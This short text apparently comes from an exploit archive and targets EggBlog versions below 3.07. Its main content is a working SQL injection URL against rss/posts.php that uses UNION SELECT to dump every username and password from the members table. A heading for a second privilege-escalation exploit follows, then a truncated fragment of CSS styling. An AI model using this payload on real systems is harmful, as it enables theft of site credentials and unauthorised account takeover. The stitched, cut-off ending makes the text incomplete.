EggBlog < 3.07 - Remote SQL Injection / Privilege Escalation
http://site/EggBlog/rss/posts.php?id=1'//UNION//SELECT//0,concat'Username:%20',username,concat'Password:%20',password//from//eggblogmembers/ This SQL injection will list you all users and passwords. -- Eggblog 2.x Remote Privilege Escalation .xpl font-family:tahoma; font-size:11px; text-decoratio...